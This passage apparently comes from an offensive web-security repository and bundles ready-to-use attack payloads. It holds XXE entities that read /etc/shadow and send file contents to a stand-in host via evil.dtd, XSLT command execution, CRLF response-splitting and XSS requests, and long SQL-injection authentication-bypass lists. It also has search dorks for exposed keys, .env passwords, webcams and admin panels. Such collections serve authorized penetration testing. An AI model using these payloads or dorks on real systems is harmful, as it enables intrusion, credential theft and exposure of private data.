encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 13 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" 
>]><foo>&xxe;</foo> 14 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 15 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 16 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 17 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 18 | <test></test> 19 | <![CDATA[<test></test>]]> 20 | &foo; 21 | %foo; 22 | count(/child::node()) 23 | x' or name()='username' or 'x'='y 24 | <name>','')); phpinfo(); exit;/*</name> 25 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 26 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 27 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 28 | <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 30 | <foo><![CDATA[' or 1=1 or ''=']]></foo> 31 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 32 | <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 33 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <xml SRC="xsstest.xml" ID=I></xml> 36 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 37 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 38 | <xsl:stylesheet version="1.0" 
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 39 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> 40 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> 41 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 42 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 43 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 44 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 45 | <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 46 | <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int; 47 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 48 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 49 | -------------------------------------------------------------------------------- /Web Application/CRLF Injection/README.md: -------------------------------------------------------------------------------- 1 | # CRLF 2 | 3 | The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, \\n). 4 | 5 | They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. 
In the HTTP protocol, the CR-LF sequence is always used to terminate a line. 6 | 7 | A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL whose value is reflected into a response header without CR/LF filtering. 8 | 9 | ## Summary 10 | - [Tools](#tools) 11 | - [Response Header Injection](#response-header-injection) 12 | - [CRLF - Add a cookie](#crlf---add-a-cookie) 13 | - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) 14 | - [CRLF - Write HTML](#crlf---write-html) 15 | - [CRLF - Filter Bypass](#crlf---filter-bypass) 16 | 17 | ## Tools 18 | 19 | - [crlfuzz](https://github.com/dwisiswant0/crlfuzz) 20 | 21 | ## Response Header Injection 22 | 23 | Si visualiza algún valor reflejado en la RESPONSE del servidor que puede manipular y fue inyectado en la REQUEST: 24 | ``` 25 | HTTP/1.1 200 OK 26 | ... 27 | Set-Cookie: author=ValorManipulado 28 | Location: http://google.com/fichero.jsp?lang=English 29 | ... 30 | ``` 31 | 32 | Modifique e ingrese en su REQUEST un carriage return y line feed: 33 | 34 | Si la respuesta ORIGINAL da una redirección 301,302: 35 | 36 | ``` 37 | http://google.com/fichero.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> 38 | ``` 39 | 40 | Si la respuesta ORIGINAL da 200 OK: 41 | ``` 42 | Set-Cookie: author=CGonzalo\r\nContent-Length:19\r\n\r\n<html>Shazam</html> 43 | ``` 44 | 45 | ``` 46 | Set-Cookie: author=CGonzalo%0d%0aContent-Length:19%0d%0a%0d%0a<html>Shazam</html> 47 | ``` 48 | 49 | *NOTA: El valor del header `Content-Length: [value]` debe coincidir con la longitud (en bytes) del HTML malicioso inyectado.* 50 | 51 | ## CRLF - Add a cookie 52 | 53 | Requested page: 54 | ``` 55 | http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue 56 | ``` 57 | 58 | HTTP Response: 59 | ``` 60 | Connection: keep-alive 61 | Content-Length: 178 62 | Content-Type: text/html 63 | Date: Mon, 09 May 2016 14:47:29 GMT 64 | Location: 
https://www.example.net/[INJECTION STARTS HERE] 65 | Set-Cookie: mycookie=myvalue 66 | X-Frame-Options: SAMEORIGIN 67 | X-Sucuri-ID: 15016 68 | x-content-type-options: nosniff 69 | x-xss-protection: 1; mode=block 70 | ``` 71 | 72 | ## CRLF - Add a cookie - XSS Bypass 73 | 74 | Requested page: 75 | ``` 76 | http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e 77 | ``` 78 | 79 | HTTP Response: 80 | ``` 81 | HTTP/1.1 200 OK 82 | Date: Tue, 20 Dec 2016 14:34:03 GMT 83 | Content-Type: text/html; charset=utf-8 84 | Content-Length: 22907 85 | Connection: close 86 | X-Frame-Options: SAMEORIGIN 87 | Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT 88 | ETag: "842fe-597b-54415a5c97a80" 89 | Vary: Accept-Encoding 90 | X-UA-Compatible: IE=edge 91 | Server: NetDNA-cache/2.2 92 | Link: <https://example.com/[INJECTION STARTS HERE] 93 | Content-Length:35 94 | X-XSS-Protection:0 95 | 96 | 23 97 | <svg onload=alert(document.domain)> 98 | 0 99 | ``` 100 | 101 | ## CRLF - Write HTML 102 | 103 | Requested page: 104 | ``` 105 | http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E 106 | ``` 107 | 108 | HTTP response: 109 | ``` 110 | Set-Cookie:en 111 | Content-Length: 0 112 | 113 | HTTP/1.1 200 OK 114 | Content-Type: text/html 115 | Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT 116 | Content-Length: 34 117 | 118 | <html>You have been Phished</html> 119 | ``` 120 | 121 | ## CRLF - Filter Bypass 122 | 123 | Using UTF-8 encoding (works when the backend keeps only the low byte of each code point, so U+560A becomes 0x0A and U+560D becomes 0x0D): 124 | 125 | ``` 126 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE 127 | ``` 128 | 129 | #### Reminder: 130 | 131 | - %E5%98%8A = %0A = \\u560a 132 | 
- %E5%98%8D = %0D = \\u560d 133 | - %E5%98%BE = %3E = \\u563e (>) 134 | - %E5%98%BC = %3C = \\u563c (<) 135 | 136 | ## Exploitation Tricks 137 | 138 | - Try to search for parameters that lead to redirects and fuzz them. 139 | - Also test the mobile version of the website, sometimes it is different or uses a different backend. 140 | 141 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Auth_Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or 1=1 limit 1 -- -+ 7 | '="or' 8 | ' or ''-' 9 | ' or '' ' 10 | ' or ''&' 11 | ' or ''^' 12 | ' or ''*' 13 | '-||0' 14 | "-||0" 15 | "-" 16 | " " 17 | "&" 18 | "^" 19 | "*" 20 | '--' 21 | "--" 22 | '--' / "--" 23 | " or ""-" 24 | " or "" " 25 | " or ""&" 26 | " or ""^" 27 | " or ""*" 28 | or true-- 29 | " or true-- 30 | ' or true-- 31 | ") or true-- 32 | ') or true-- 33 | ' or 'x'='x 34 | ') or ('x')=('x 35 | ')) or (('x'))=(('x 36 | " or "x"="x 37 | ") or ("x")=("x 38 | ")) or (("x"))=(("x 39 | or 2 like 2 40 | or 1=1 41 | or 1=1-- 42 | or 1=1# 43 | or 1=1/* 44 | admin' -- 45 | admin' -- - 46 | admin' # 47 | admin'/* 48 | admin' or '2' LIKE '1 49 | admin' or 2 LIKE 2-- 50 | admin' or 2 LIKE 2# 51 | admin') or 2 LIKE 2# 52 | admin') or 2 LIKE 2-- 53 | admin') or ('2' LIKE '2 54 | admin') or ('2' LIKE '2'# 55 | admin') or ('2' LIKE '2'/* 56 | admin' or '1'='1 57 | admin' or '1'='1'-- 58 | admin' or '1'='1'# 59 | admin' or '1'='1'/* 60 | admin'or 1=1 or ''=' 61 | admin' or 1=1 62 | admin' or 1=1-- 63 | admin' or 1=1# 64 | admin' or 1=1/* 65 | admin') or ('1'='1 66 | admin') or ('1'='1'-- 67 | admin') or ('1'='1'# 68 | admin') or ('1'='1'/* 69 | admin') or '1'='1 70 | admin') or '1'='1'-- 71 | admin') or '1'='1'# 72 | admin') or '1'='1'/* 73 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 74 | admin" -- 75 | admin';-- azer 76 | admin" # 77 | 
admin"/* 78 | admin" or "1"="1 79 | admin" or "1"="1"-- 80 | admin" or "1"="1"# 81 | admin" or "1"="1"/* 82 | admin"or 1=1 or ""=" 83 | admin" or 1=1 84 | admin" or 1=1-- 85 | admin" or 1=1# 86 | admin" or 1=1/* 87 | admin") or ("1"="1 88 | admin") or ("1"="1"-- 89 | admin") or ("1"="1"# 90 | admin") or ("1"="1"/* 91 | admin") or "1"="1 92 | admin") or "1"="1"-- 93 | admin") or "1"="1"# 94 | admin") or "1"="1"/* 95 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 96 | --/-- 97 | '--'/"--" 98 | "--"/'--' 99 | administrator'-- 100 | OR 1=1 -- 101 | ' OR 2=2 -- 102 | ") OR 1=1 -- 103 | ') OR 1=1 -- 104 | admin== 105 | administrator== 106 | admin'- 107 | 'or''=' 108 | ' or 1=1 LIMIT 1 -- 109 | ' or 1=1 LIMIT 1 -- - 110 | ' or 1=1 LIMIT 1# 111 | 'or 1# 112 | ' or 1=1 -- 113 | ' or 1=1 -- - 114 | ' or 1=1# 115 | " OR "1"="1 116 | == 117 | = 118 | ' 119 | ' -- 120 | ' # 121 | ' – 122 | '-- 123 | '/* 124 | '# 125 | " -- 126 | " # 127 | "/* 128 | ' and 1='1 129 | ' and a='a 130 | or 1=1 131 | or true 132 | ' or ''=' 133 | " or ""=" 134 | 1′) and '1′='1– 135 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 136 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 137 | and 1=1 138 | and 1=1– 139 | ' and 'one'='one 140 | ' and 'one'='one– 141 | ' group by password having 1=1-- 142 | ' group by userid having 1=1-- 143 | ' group by username having 1=1-- 144 | like '%' 145 | or 0=0 -- 146 | or 0=0 # 147 | or 0=0 – 148 | ' or 0=0 # 149 | ' or 0=0 -- 150 | ' or 0=0 # 151 | ' or 0=0 – 152 | " or 0=0 -- 153 | " or 0=0 # 154 | " or 0=0 – 155 | %' or '0'='0 156 | or 1=1 157 | or 1=1-- 158 | or 1=1/* 159 | or 1=1# 160 | or 1=1– 161 | ' or 1=1-- 162 | ' or '1'='1 163 | ' or '1'='1'-- 164 | ' or '1'='1'/* 165 | ' or '1'='1'# 166 | ' or '1′='1 167 | ' or 1=1 168 | ' or 1=1 -- 169 | ' or 1=1 – 170 | ' or 1=1-- 171 | ' or 1=1;# 172 | ' or 1=1/* 173 | ' or 1=1# 174 | ' or 1=1– 175 | ') or '1'='1 176 | ') or '1'='1-- 177 | ') or 
'1'='1'-- 178 | ') or '1'='1'/* 179 | ') or '1'='1'# 180 | ') or ('1'='1 181 | ') or ('1'='1-- 182 | ') or ('1'='1'-- 183 | ') or ('1'='1'/* 184 | ') or ('1'='1'# 185 | 'or'1=1 186 | 'or'1=1′ 187 | " or "1"="1 188 | " or "1"="1"-- 189 | " or "1"="1"/* 190 | " or "1"="1"# 191 | " or 1=1 192 | " or 1=1 -- 193 | " or 1=1 – 194 | " or 1=1-- 195 | " or 1=1/* 196 | " or 1=1# 197 | " or 1=1– 198 | ") or "1"="1 199 | ") or "1"="1"-- 200 | ") or "1"="1"/* 201 | ") or "1"="1"# 202 | ") or ("1"="1 203 | ") or ("1"="1"-- 204 | ") or ("1"="1"/* 205 | ") or ("1"="1"# 206 | ) or '1′='1– 207 | ) or ('1′='1– 208 | ' or 1=1 LIMIT 1;# 209 | 'or 1=1 or ''=' 210 | "or 1=1 or ""=" 211 | ' or 'a'='a 212 | ' or a=a-- 213 | ' or a=a– 214 | ') or ('a'='a 215 | " or "a"="a 216 | ") or ("a"="a 217 | ') or ('a'='a and hi") or ("a"="a 218 | ' or 'one'='one 219 | ' or 'one'='one– 220 | ' or uid like '% 221 | ' or uname like '% 222 | ' or userid like '% 223 | ' or user like '% 224 | ' or username like '% 225 | ' or 'x'='x 226 | ') or ('x'='x 227 | " or "x"="x 228 | ' OR 'x'='x'#; 229 | '=' 'or' and '=' 'or' 230 | ' UNION ALL SELECT 1, @@version;# 231 | ' UNION ALL SELECT system_user(),user();# 232 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 233 | admin' and substring(password/text(),1,1)='7 234 | ' and substring(password/text(),1,1)='7 235 | ' or 1=1 limit 1 -- -+ 236 | '="or' 237 | -------------------------------------------------------------------------------- /Web Application/Dorks/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | - [Google Dorks](#google-dorks) 4 | - [Github Dorks](#github-dorks) 5 | - [Shodan](#shodan) 6 | - [ESI Detection](#esi-detection) 7 | 8 | ## Google Dorks 9 | 10 | #### TOP 5 11 | Top 5 Google dorks for identifying interesting and potentially sensitive information about your target (example.com) 12 | ``` 13 | inurl:example.com intitle:"index of" 14 | ``` 15 | ``` 16 | 
inurl:example.com intitle:"index of /" "*key.pem" 17 | ``` 18 | ``` 19 | inurl:example.com ext:log 20 | ``` 21 | ``` 22 | inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 23 | ``` 24 | ``` 25 | inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 26 | ``` 27 | ``` 28 | example.com "password" 29 | ``` 30 | 31 | #### CACHE 32 | This dork will show you the cached version of any website: 33 | ``` 34 | cache:example.com 35 | ``` 36 | 37 | #### ALLINTEXT 38 | Searches for specific text contained on any web page: 39 | ``` 40 | site:example.com allintext:hacking 41 | ``` 42 | 43 | #### ALLINURL 44 | It can be used to fetch results whose URL contains all the specified terms: 45 | ``` 46 | allinurl:admin site:example.com 47 | allinurl:clientarea site:example.com 48 | ``` 49 | 50 | #### INURL 51 | This is exactly the same as `allinurl`, but it is only useful for one single keyword: 52 | ``` 53 | domainexample inurl:admin 54 | inurl:/proc/self/cwd (Google Dork can be used to detect vulnerable servers | /proc/self/cwd es equivalente al directorio actual) 55 | site:.edu filetype:xls inurl:"email.xls" (find email lists) 56 | inurl:top.htm inurl:currenttime (webcam) 57 | inurl:"lvappl.htm" (webcam) 58 | inurl:zoom.us/j and intext:scheduled for (zoom calls) 59 | "Index of" inurl:phpmyadmin (phpmyadmin panel) 60 | inurl:_cpanel/forgotpwd (cPanel password reset) 61 | ``` 62 | 63 | #### FILETYPE 64 | Used to search for any kind of file extension; for example, if you want to search for `pdf` files you can use: 65 | ``` 66 | allintext:username filetype:log 67 | example.com filetype:pdf 68 | example.com filetype:log 69 | manual filetype:pdf 70 | allintext:"APP_ENV" OR "APP*" filetype:env (.env files are the ones used by popular web development frameworks to declare general variables and configurations for local and online dev environments.) 
71 | filetype:log username putty (find SSH private keys) 72 | allintitle: restricted filetype:doc site:gov (Government documents) 73 | ``` 74 | 75 | #### INTITLE 76 | Used to search for various keywords inside the title, for example `intitle:security tools` will search for titles beginning with “security” but “tools” can be somewhere else in the page: 77 | ``` 78 | intitle:security tools 79 | intitle:"index of" inurl:ftp (explore public FTP servers) 80 | intitle:"webcamXP 5" (webcam) 81 | intitle:index of pdf intext:.mp4 (legal free media files or PDF documents) 82 | intitle:"Index of" wp-admin (wordpress admin) 83 | intitle:"admin panel" OR intitle:"request password" intext:"email address" (password recovery panel) 84 | intitle:"Apache2 Ubuntu Default Page: It works" (apache2 web page) 85 | ``` 86 | 87 | #### INANCHOR 88 | This is useful when you need to search for an exact anchor text used on any links: 89 | ``` 90 | inanchor:"0xcgonzalo" 91 | ``` 92 | 93 | #### INTEXT 94 | Useful to locate pages that contain certain characters or strings inside their text: 95 | ``` 96 | intext:"0xcgonzalo" 97 | ``` 98 | 99 | #### WILDCARD * 100 | Wildcard used to search pages that contain “anything” in place of the asterisk: 101 | ``` 102 | how to * a website 103 | ``` 104 | 105 | #### OPERATOR | 106 | This is a logical operator, e.g. `"security"|"tips"` will show all the sites which contain “security” or “tips,” or both words 107 | ``` 108 | "security"|"tips" site:example.com 109 | ``` 110 | 111 | #### OPERATOR + 112 | Used to concatenate words, useful to detect pages that use more than one specific key: 113 | ``` 114 | security + trails 115 | ``` 116 | 117 | #### OPERATOR - 118 | Minus operator is used to avoid showing results that contain certain words, e.g. 
`security -trails` will show pages that use “security” in their text, but not those that have the word “trails”: 119 | ``` 120 | security -trails site:example.com 121 | ``` 122 | 123 | #### Kibana (is a proprietary data visualization dashboard software for Elasticsearch) 124 | Kibana will return a content length of 217 if it is publicly open and one can access the dashboard without authentication: 125 | 126 | ``` 127 | inurl:app/kibana 128 | inurl:app/kibana intext:Loading Kibana 129 | inurl::5601/app/kibana 130 | kibana content-lenght: 217 (in Shodan search) 131 | inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software" 132 | ``` 133 | 134 | ## Github Dorks 135 | 136 | ``` 137 | domain.com "password" 138 | ``` 139 | 140 | ## Shodan Dorks 141 | 142 | ### ESI Detection 143 | 144 | Detectar ESI (edge-side-include-injection), en el encabezado HTTP `Surrogate-Control`. Este encabezado se utiliza para indicar a los servidores Proxies que las etiquetas ESI podrían estar presentes en la respuesta y que deben analizarse como tales: 145 | ``` 146 | Surrogate-Control: content="ESI/1.0" 147 | ``` 148 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Generic_Errors.txt: -------------------------------------------------------------------------------- 1 | OR 1=1 2 | OR 1=0 3 | OR x=x 4 | OR x=y 5 | OR 1=1# 6 | OR 1=0# 7 | OR x=x# 8 | OR x=y# 9 | OR 1=1-- 10 | OR 1=0-- 11 | OR x=x-- 12 | OR x=y-- 13 | OR 3409=3409 AND ('pytW' LIKE 'pytW 14 | OR 3409=3409 AND ('pytW' LIKE 'pytY 15 | HAVING 1=1 16 | HAVING 1=0 17 | HAVING 1=1# 18 | HAVING 1=0# 19 | HAVING 1=1-- 20 | HAVING 1=0-- 21 | AND 1=1 22 | AND 1=0 23 | AND 1=1-- 24 | AND 1=0-- 25 | AND 1=1# 26 | AND 1=0# 27 | AND 1=1 AND '%'=' 28 | AND 1=0 AND '%'=' 29 | AND 1083=1083 AND (1427=1427 30 | AND 7506=9091 AND (5913=5913 31 | AND 1083=1083 AND ('1427=1427 32 | AND 7506=9091 AND ('5913=5913 33 | AND 7300=7300 AND 'pKlZ'='pKlZ 34 | AND 
7300=7300 AND 'pKlZ'='pKlY 35 | AND 7300=7300 AND ('pKlZ'='pKlZ 36 | AND 7300=7300 AND ('pKlZ'='pKlY 37 | AS INJECTX WHERE 1=1 AND 1=1 38 | AS INJECTX WHERE 1=1 AND 1=0 39 | AS INJECTX WHERE 1=1 AND 1=1# 40 | AS INJECTX WHERE 1=1 AND 1=0# 41 | AS INJECTX WHERE 1=1 AND 1=1-- 42 | AS INJECTX WHERE 1=1 AND 1=0-- 43 | WHERE 1=1 AND 1=1 44 | WHERE 1=1 AND 1=0 45 | WHERE 1=1 AND 1=1# 46 | WHERE 1=1 AND 1=0# 47 | WHERE 1=1 AND 1=1-- 48 | WHERE 1=1 AND 1=0-- 49 | ORDER BY 1-- 50 | ORDER BY 2-- 51 | ORDER BY 3-- 52 | ORDER BY 4-- 53 | ORDER BY 5-- 54 | ORDER BY 6-- 55 | ORDER BY 7-- 56 | ORDER BY 8-- 57 | ORDER BY 9-- 58 | ORDER BY 10-- 59 | ORDER BY 11-- 60 | ORDER BY 12-- 61 | ORDER BY 13-- 62 | ORDER BY 14-- 63 | ORDER BY 15-- 64 | ORDER BY 16-- 65 | ORDER BY 17-- 66 | ORDER BY 18-- 67 | ORDER BY 19-- 68 | ORDER BY 20-- 69 | ORDER BY 21-- 70 | ORDER BY 22-- 71 | ORDER BY 23-- 72 | ORDER BY 24-- 73 | ORDER BY 25-- 74 | ORDER BY 26-- 75 | ORDER BY 27-- 76 | ORDER BY 28-- 77 | ORDER BY 29-- 78 | ORDER BY 30-- 79 | ORDER BY 31337-- 80 | ORDER BY 1# 81 | ORDER BY 2# 82 | ORDER BY 3# 83 | ORDER BY 4# 84 | ORDER BY 5# 85 | ORDER BY 6# 86 | ORDER BY 7# 87 | ORDER BY 8# 88 | ORDER BY 9# 89 | ORDER BY 10# 90 | ORDER BY 11# 91 | ORDER BY 12# 92 | ORDER BY 13# 93 | ORDER BY 14# 94 | ORDER BY 15# 95 | ORDER BY 16# 96 | ORDER BY 17# 97 | ORDER BY 18# 98 | ORDER BY 19# 99 | ORDER BY 20# 100 | ORDER BY 21# 101 | ORDER BY 22# 102 | ORDER BY 23# 103 | ORDER BY 24# 104 | ORDER BY 25# 105 | ORDER BY 26# 106 | ORDER BY 27# 107 | ORDER BY 28# 108 | ORDER BY 29# 109 | ORDER BY 30# 110 | ORDER BY 31337# 111 | ORDER BY 1 112 | ORDER BY 2 113 | ORDER BY 3 114 | ORDER BY 4 115 | ORDER BY 5 116 | ORDER BY 6 117 | ORDER BY 7 118 | ORDER BY 8 119 | ORDER BY 9 120 | ORDER BY 10 121 | ORDER BY 11 122 | ORDER BY 12 123 | ORDER BY 13 124 | ORDER BY 14 125 | ORDER BY 15 126 | ORDER BY 16 127 | ORDER BY 17 128 | ORDER BY 18 129 | ORDER BY 19 130 | ORDER BY 20 131 | ORDER BY 21 132 | ORDER BY 22 133 | ORDER 
BY 23 134 | ORDER BY 24 135 | ORDER BY 25 136 | ORDER BY 26 137 | ORDER BY 27 138 | ORDER BY 28 139 | ORDER BY 29 140 | ORDER BY 30 141 | ORDER BY 31337 142 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 143 | RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 144 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- 145 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- 146 | %' AND 8310=8310 AND '%'=' 147 | %' AND 8310=8311 AND '%'=' 148 | and (select substring(@@version,1,1))='X' 149 | and (select substring(@@version,1,1))='M' 150 | and (select substring(@@version,2,1))='i' 151 | and (select substring(@@version,2,1))='y' 152 | and (select substring(@@version,3,1))='c' 153 | and (select substring(@@version,3,1))='S' 154 | and (select substring(@@version,3,1))='X' 155 | 1 156 | 1' 157 | 1" 158 | [1] 159 | 1` 160 | 1\ 161 | 1/*'*/ 162 | 1/*!1111'*/ 163 | 1'||'asd'||' 164 | 1' or '1'='1 165 | 1 or 1=1 166 | 'or''=' 167 | ' 168 | '' 169 | ` 170 | `` 171 | , 172 | " 173 | "" 174 | / 175 | // 176 | \ 177 | \\ 178 | ; 179 | ' or " 180 | -- or # 181 | ' OR '1 182 | ' OR 1 -- - 183 | " OR "" = " 184 | " OR 1 = 1 -- - 185 | ' OR '' = ' 186 | '=' 187 | 'LIKE' 188 | '=0--+ 189 | OR 1=1 190 | ' OR 'x'='x 191 | ' AND id IS NULL; -- 192 | '''''''''''''UNION SELECT '2 193 | %00 194 | /*…*/ 195 | + addition, concatenate (or space in url) 196 | || (double pipe) concatenate 197 | % wildcard attribute indicator 198 | @variable local variable 199 | @@variable global variable 200 | # Numeric 201 | AND 1 202 | AND 0 203 | AND true 204 | AND false 205 | 1-false 206 | 1-true 207 | 1*56 208 | -2 209 | 1' ORDER BY 1--+ 210 | 1' ORDER BY 2--+ 211 | 1' ORDER BY 3--+ 212 | 1' ORDER BY 1,2--+ 213 | 1' ORDER BY 1,2,3--+ 214 | 1' GROUP BY 1,2,--+ 215 | 1' GROUP BY 1,2,3--+ 216 | ' GROUP BY columnnames having 1=1 -- 217 | -1' UNION SELECT 1,2,3--+ 218 | ' UNION SELECT sum(columnname ) from tablename -- 219 | -1 UNION 
SELECT 1 INTO @,@ 220 | -1 UNION SELECT 1 INTO @,@,@ 221 | 1 AND (SELECT * FROM Users) = 1 222 | ' AND MID(VERSION(),1,1) = '5'; 223 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 224 | Finding the table name 225 | Time-Based: 226 | ,(select * from (select(sleep(10)))a) 227 | %2c(select%20*%20from%20(select(sleep(10)))a) 228 | ';WAITFOR DELAY '0:0:30'-- 229 | Comments: 230 | # Hash comment 231 | /* C-style comment 232 | -- - SQL comment 233 | ;%00 Nullbyte 234 | ` Backtick 235 | -------------------------------------------------------------------------------- /Web Application/XXE/XXE in PDF/xxe_in_pdf.md: -------------------------------------------------------------------------------- 1 | # PDF Upload - XXE and CORS bypass 2 | 3 | #### Content copied from [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html) 4 | 5 | ### Javascript function in Reader can be used to read data from external entities \(CVE-2014-8452\) 6 | 7 | Status: Fixed 8 | Reality: Not Fixed 9 | 10 | This one is about a simple XXE I discovered. 11 | I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in 12 | XMLData.parse. It was possible to use external entities and reference them. 13 | I read the specification and it turns out there are more functions than "parse" to read XML. 14 | I created a simple xml file, which references an url from the same domain and parsed it with loadXML. 
